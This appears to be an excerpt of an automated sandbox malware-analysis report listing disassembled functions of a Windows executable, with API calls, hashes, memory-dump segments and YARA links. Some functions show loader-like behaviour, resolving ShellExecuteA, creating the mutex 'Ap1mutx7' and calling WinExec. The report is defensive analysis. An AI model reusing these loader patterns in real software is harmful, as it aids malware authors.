                                    • API ID: EnumSleep$Global$AllocCharCloseErrorFreeLastOpenResourceUpperlstrcatlstrcpylstrlen
                                    • String ID:
                                    • API String ID: 904141561-0
                                    • Opcode ID: e8da61fa2c637a7ab5fa75f1d3e7a4fb0ca6fe05b6e201892f28131d5b268a99
                                    • Instruction ID: d596a3499b39c6180e7c707b1c41ad4678cebe788090d431a7d1ad0438f6f617
                                    • Opcode Fuzzy Hash: e8da61fa2c637a7ab5fa75f1d3e7a4fb0ca6fe05b6e201892f28131d5b268a99
                                    • Instruction Fuzzy Hash: 2C517DB1E40218EFDB14CF99D888BEEBBB5FB48315F10820AE115AB280C7759949CB64
                                    Function 0043A180 Relevance: 19.6, APIs: 8, Strings: 3, Instructions: 366COMMON
                                    Download Yara Rule
                                    APIs
                                    • SelectObject.GDI32(00000000,?), ref: 0043A236
                                    • SelectObject.GDI32(?,00000000), ref: 0043A259
                                    • SelectObject.GDI32(00000000,?), ref: 0043A285
                                    • DeleteDC.GDI32(00000000), ref: 0043A292
                                    • SelectObject.GDI32(?,?), ref: 0043A29A
                                    • DeleteDC.GDI32(?), ref: 0043A2A1
                                    • DeleteObject.GDI32(?), ref: 0043A2A7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Object$Select$Delete
                                    • String ID: $($(
                                    • API String ID: 4028988585-3669016180
                                    • Opcode ID: 84010494b92e2d4ec0b616076e4817eaab529cd69971b5885d18670a8ca05a65
                                    • Instruction ID: d1ca26a986cc5534642cb4579912b8a77033c4e4274c8961244b6a1e09a3a350
                                    • Opcode Fuzzy Hash: 84010494b92e2d4ec0b616076e4817eaab529cd69971b5885d18670a8ca05a65
                                    • Instruction Fuzzy Hash: 6AD156B1A043019FC714CF29D884A6BBBE9EFC8310F14892EF99687360D775E855CB66
                                    Function 00436F00 Relevance: 19.5, APIs: 10, Strings: 1, Instructions: 288COMMON
                                    Download Yara Rule
                                    APIs
                                    • CreateSolidBrush.GDI32(00FFFFFF), ref: 0043705F
                                    • GetWindowRect.USER32(?), ref: 00437089
                                    • GetStockObject.GDI32(00000005), ref: 004370B7
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004370C5
                                    • GetWindowRect.USER32(?,?), ref: 00437133
                                    • GetWindowRect.USER32(?,?), ref: 00437144
                                    • GetWindowRect.USER32(?,?), ref: 00437159
                                    • GetSystemMetrics.USER32(00000001), ref: 0043716F
                                    • GetWindowRect.USER32(?,?), ref: 004371FA
                                    • OffsetRect.USER32(?,00000000,00000001), ref: 00437214
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Window$BrushCreateCursorLoadMetricsObjectOffsetSolidStockSystem
                                    • String ID: |TL
                                    • API String ID: 3805611468-51895757
                                    • Opcode ID: 560b82dc4401b8dfe4325c3d7a1f830f424f40ef0e9304d60ef2aa10be282a06
                                    • Instruction ID: 5ca792eb847d3b0c60dd0cb7fba0033e7a17ad577bd9e077365da9ae2d4dde6a
                                    • Opcode Fuzzy Hash: 560b82dc4401b8dfe4325c3d7a1f830f424f40ef0e9304d60ef2aa10be282a06
                                    • Instruction Fuzzy Hash: DDA1C2B0604701AFD764DF75C895F6FB7E5AB88708F00892EF19A87381DB78E8058B59
                                    Function 0041DC80 Relevance: 19.4, APIs: 6, Strings: 5, Instructions: 130stringprocessCOMMON
                                    Download Yara Rule
                                    APIs
                                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,?), ref: 0041DD18
                                    • lstrcat.KERNEL32(?,\shell\open\command), ref: 0041DD57
                                    • lstrlen.KERNEL32(?), ref: 0041DDAC
                                    • lstrcat.KERNEL32(00000000,005BDD2C), ref: 0041DDF5
                                    • lstrcat.KERNEL32(00000000,?), ref: 0041DDFD
                                    • WinExec.KERNEL32(?,?), ref: 0041DE05
                                      • Part of subcall function 004BC4B3: InterlockedDecrement.KERNEL32 ref: 004BC4C7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: lstrcat$DecrementExecExecuteInterlockedShelllstrlen
                                    • String ID: "%1"$.htm$\shell\open\command$mailto:$open
                                    • API String ID: 51986957-2182632014
                                    • Opcode ID: 1f5596301d1e255cda7ced775cb7d5b6727dd359c1e3f2316bbe3641ffe6d6e3
                                    • Instruction ID: 4d22f93144f8ae5cda70eaebec58e74259e7cc7f1d63d8bbf3479efef72a1653
                                    • Opcode Fuzzy Hash: 1f5596301d1e255cda7ced775cb7d5b6727dd359c1e3f2316bbe3641ffe6d6e3
                                    • Instruction Fuzzy Hash: 46411672644312AFC324DB25DC80FEBB7A4AF94714F004D2EF99193280E778E944CBA6
                                    Function 04310260 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 52librarysleeploaderCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetModuleFileNameA.KERNEL32(00000000,04311778,000001FE), ref: 043101D5
                                    • LoadLibraryExA.KERNEL32(SHELL32.DLL,00000000,00000000), ref: 043101F4
                                    • GetProcAddress.KERNEL32(00000000,ShellExecuteA), ref: 04310202
                                    • CreateMutexA.KERNEL32(00000000,00000000,Ap1mutx7), ref: 0431022F
                                    • GetLastError.KERNEL32(00000000), ref: 04310236
                                    • Sleep.KERNEL32(000927C0), ref: 04310245
                                    • ExitProcess.KERNEL32(00000000), ref: 0431024D
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3828792979.0000000004310000.00000040.00001000.00020000.00000000.sdmp, Offset: 04310000, based on PE: false
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_4310000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: AddressCreateErrorExitFileLastLibraryLoadModuleMutexNameProcProcessSleep
                                    • String ID: Ap1mutx7$SHELL32.DLL$ShellExecuteA$open
                                    • API String ID: 1721171764-1163154406
                                    • Opcode ID: e21da19acf43ca4be23f49ad3665f7bddf3231c6d67d13a3599f374a33d2e894
                                    • Instruction ID: 85f07ec8803fc116bee59f2f182fe2b5852f9e0589b90e025695cb05139443cd
                                    • Opcode Fuzzy Hash: e21da19acf43ca4be23f49ad3665f7bddf3231c6d67d13a3599f374a33d2e894
                                    • Instruction Fuzzy Hash: 7E11E171244389ABEF14DEE08D4DFDD3769AF44B01F445415FA09EE0E0DBB5A244876B
                                    Function 00414740 Relevance: 18.4, APIs: 12, Instructions: 372COMMON
                                    Download Yara Rule
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID:
                                    • String ID:
                                    • API String ID:
                                    • Opcode ID: 300c2bd71ca31407ed927988580ab82969ac675845b0dc258b5f6de17a1d5f15
                                    • Instruction ID: 873fd80c3cc1e43b675f06b06f658653319968fb3668e8a714bae1d7777c0225
                                    • Opcode Fuzzy Hash: 300c2bd71ca31407ed927988580ab82969ac675845b0dc258b5f6de17a1d5f15
                                    • Instruction Fuzzy Hash: 9DD17D756157009FD720CF24C881EABB7E5FB84358F244A2EE19AC7790E738E881CB59
                                    Function 004193D0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMON
                                    Download Yara Rule
                                    APIs
                                      • Part of subcall function 0043A180: SelectObject.GDI32(00000000,?), ref: 0043A236
                                      • Part of subcall function 0043A180: SelectObject.GDI32(?,00000000), ref: 0043A259
                                      • Part of subcall function 0043A180: SelectObject.GDI32(00000000,?), ref: 0043A285
                                      • Part of subcall function 0043A180: DeleteDC.GDI32(00000000), ref: 0043A292
                                      • Part of subcall function 0043A180: SelectObject.GDI32(?,?), ref: 0043A29A
                                      • Part of subcall function 0043A180: DeleteDC.GDI32(?), ref: 0043A2A1
                                    • __ftol.LIBCMT ref: 004194F5
                                    • __ftol.LIBCMT ref: 00419502
                                    • CreateRectRgn.GDI32(00000000,?,00000000,?), ref: 00419574
                                    • CombineRgn.GDI32(?,?,004DC338,00000004), ref: 0041959A
                                    • SetRect.USER32(?,00000000,?,?,?), ref: 004195E6
                                    • IntersectRect.USER32(?,?,?), ref: 004195FE
                                    • IsRectEmpty.USER32(?), ref: 00419629
                                    • CreateRectRgn.GDI32(00000000,?,?,00000000), ref: 004196CE
                                    • CombineRgn.GDI32(?,?,004DC338,00000004), ref: 004196F4
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$ObjectSelect$CombineCreateDelete__ftol$EmptyIntersect
                                    • String ID: pTL
                                    • API String ID: 1957208593-168633513
                                    • Opcode ID: e69314494a573abb83df45538d9da15f45cf10d231d30dfcf35bc7a04d6c5d6c
                                    • Instruction ID: 5b57430de4f51f61671cab0d043c128a42f67b78ab7e2f3821ded82c6cae64ba
                                    • Opcode Fuzzy Hash: e69314494a573abb83df45538d9da15f45cf10d231d30dfcf35bc7a04d6c5d6c
                                    • Instruction Fuzzy Hash: FCA18C716083419FC724CF69C894A9BBBE9FFC8344F548A2DF5A583290EB74E844CB56
                                    Function 004168D0 Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 260COMMON
                                    Download Yara Rule
                                    APIs
                                    • GetStockObject.GDI32(00000005), ref: 004169D9
                                    • LoadCursorA.USER32(00000000,00007F00), ref: 004169E7
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: CursorLoadObjectStock
                                    • String ID: _EL_Tab
                                    • API String ID: 3794545487-2917575613
                                    • Opcode ID: 447d4e0b5c3a9f8bfe289a024b77f450ce231d76a6bfcfe5e32e216b52d1493a
                                    • Instruction ID: acb610fc98af99c1db3f54d823baed8cb0d1824b7c12ef99b885ffc0f61ca5b2
                                    • Opcode Fuzzy Hash: 447d4e0b5c3a9f8bfe289a024b77f450ce231d76a6bfcfe5e32e216b52d1493a
                                    • Instruction Fuzzy Hash: 17819071744740ABD324DB69CC81FABB7E5BB88B10F10892EF686D7380D678E845CB55
                                    Function 00443D20 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 186COMMON
                                    Download Yara Rule
                                    APIs
                                    • CopyRect.USER32(?,00000000), ref: 00443D97
                                    • IsRectEmpty.USER32(?), ref: 00443DA2
                                    • GetClientRect.USER32(00000000,?), ref: 00443DE1
                                    • DPtoLP.GDI32(?,?,00000002), ref: 00443DF3
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00443E30
                                    • CreateRectRgnIndirect.GDI32(?), ref: 00443E48
                                    • OffsetRect.USER32(?,?,?), ref: 00443E6D
                                    • LPtoDP.GDI32(?,?,00000002), ref: 00443E7F
                                      • Part of subcall function 004C3191: __EH_prolog.LIBCMT ref: 004C3196
                                      • Part of subcall function 004C3191: CreatePen.GDI32(?,?,?), ref: 004C31B9
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,00000000), ref: 004C279A
                                      • Part of subcall function 004C2778: SelectObject.GDI32(?,?), ref: 004C27B0
                                      • Part of subcall function 004C273C: GetStockObject.GDI32(?), ref: 004C2745
                                      • Part of subcall function 004C273C: SelectObject.GDI32(00414435,00000000), ref: 004C275F
                                      • Part of subcall function 004C273C: SelectObject.GDI32(00414435,00000000), ref: 004C276A
                                      • Part of subcall function 004C28B0: SetROP2.GDI32(?,00000000), ref: 004C28C9
                                      • Part of subcall function 004C28B0: SetROP2.GDI32(?,00000000), ref: 004C28D7
                                    • Rectangle.GDI32(?,?,?,?,?), ref: 00443EF3
                                      • Part of subcall function 004C2BA5: SelectClipRgn.GDI32(?,00000000), ref: 004C2BC7
                                      • Part of subcall function 004C2BA5: SelectClipRgn.GDI32(?,?), ref: 004C2BDD
                                      • Part of subcall function 004C317B: DeleteObject.GDI32(00000000), ref: 004C318A
                                      • Part of subcall function 004C2EEE: __EH_prolog.LIBCMT ref: 004C2EF3
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: ObjectSelect$Rect$ClipCreateH_prolog$ClientCopyDeleteEmptyIndirectOffsetRectangleStock
                                    • String ID: pTL
                                    • API String ID: 2567930114-168633513
                                    • Opcode ID: 9c9a84da57ada6ddaee482ede29995664f65bd2041df9b43d564bdf6bc93906f
                                    • Instruction ID: 221e08ce092222e5f7391ac32da923724b7d57e7dec498f9336bbe0ad5ae7e36
                                    • Opcode Fuzzy Hash: 9c9a84da57ada6ddaee482ede29995664f65bd2041df9b43d564bdf6bc93906f
                                    • Instruction Fuzzy Hash: A9616D75504300AFC314DF69C885E6BB7E9EFC8708F048A1DF59683291DBB8EA08CB56
                                    Function 0044EFD0 Relevance: 17.7, APIs: 9, Strings: 1, Instructions: 185windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    • GetClientRect.USER32(?,?), ref: 0044EFFE
                                    • FillRect.USER32(?,?,00000000), ref: 0044F05E
                                    • FillRect.USER32(?,?,00000000), ref: 0044F0CE
                                      • Part of subcall function 004C31E1: __EH_prolog.LIBCMT ref: 004C31E6
                                      • Part of subcall function 004C31E1: CreateSolidBrush.GDI32(?), ref: 004C3203
                                    • FillRect.USER32(?,?,00000000), ref: 0044F145
                                    • SelectObject.GDI32(00000000,?), ref: 0044F183
                                    • SetStretchBltMode.GDI32(?,00000000), ref: 0044F1B5
                                    • StretchBlt.GDI32(?,?,?,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0044F1E8
                                    • SelectObject.GDI32(00000000,?), ref: 0044F21F
                                    • DeleteDC.GDI32(00000000), ref: 0044F22C
                                    Strings
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005BA000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005D2000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.00000000005DF000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000612000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000618000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000061A000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000621000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.000000000062B000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3735798001.0000000000638000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.0000000000639000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3759946431.000000000063D000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.000000000063E000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3762604592.0000000000641000.00000040.00000001.01000000.00000004.sdmpDownload File
                                    • Associated: 00000006.00000002.3765109376.000000000064E000.00000080.00000001.01000000.00000004.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_6_2_400000_#U6587#U4ef6#U7279#U5f81#U6458#U8981#U5217#U8868#U751f#U6210.jbxd
                                    Similarity
                                    • API ID: Rect$Fill$ObjectSelectStretch$BrushClientCreateDeleteH_prologModeSolid
                                    • String ID: pTL
                                    • API String ID: 3514727852-168633513
                                    • Opcode ID: c9e283ac1c631f98ac612fc24d9bb68c081cb28c33ac07d883b7ca7e649dd567
                                    • Instruction ID: 4cd22d6fecae0d1bde94df7a6cf9fb5faba363f4eb1b78a2e503bab71cf30d88
                                    • Opcode Fuzzy Hash: c9e283ac1c631f98ac612fc24d9bb68c081cb28c33ac07d883b7ca7e649dd567
                                    • Instruction Fuzzy Hash: F1610C75204701AFE724DF65C994F6BB3E8FB88704F00892EF95A83240DB75E905CB25
                                    Function 00425550 Relevance: 16.7, APIs: 11, Instructions: 169windowCOMMON
                                    Download Yara Rule
                                    APIs
                                    Memory Dump Source
                                    • Source File: 00000006.00000002.3735798001.0000000000401000.00000040.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true
                                    • Associated: 00000006.00000002.3734232993.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
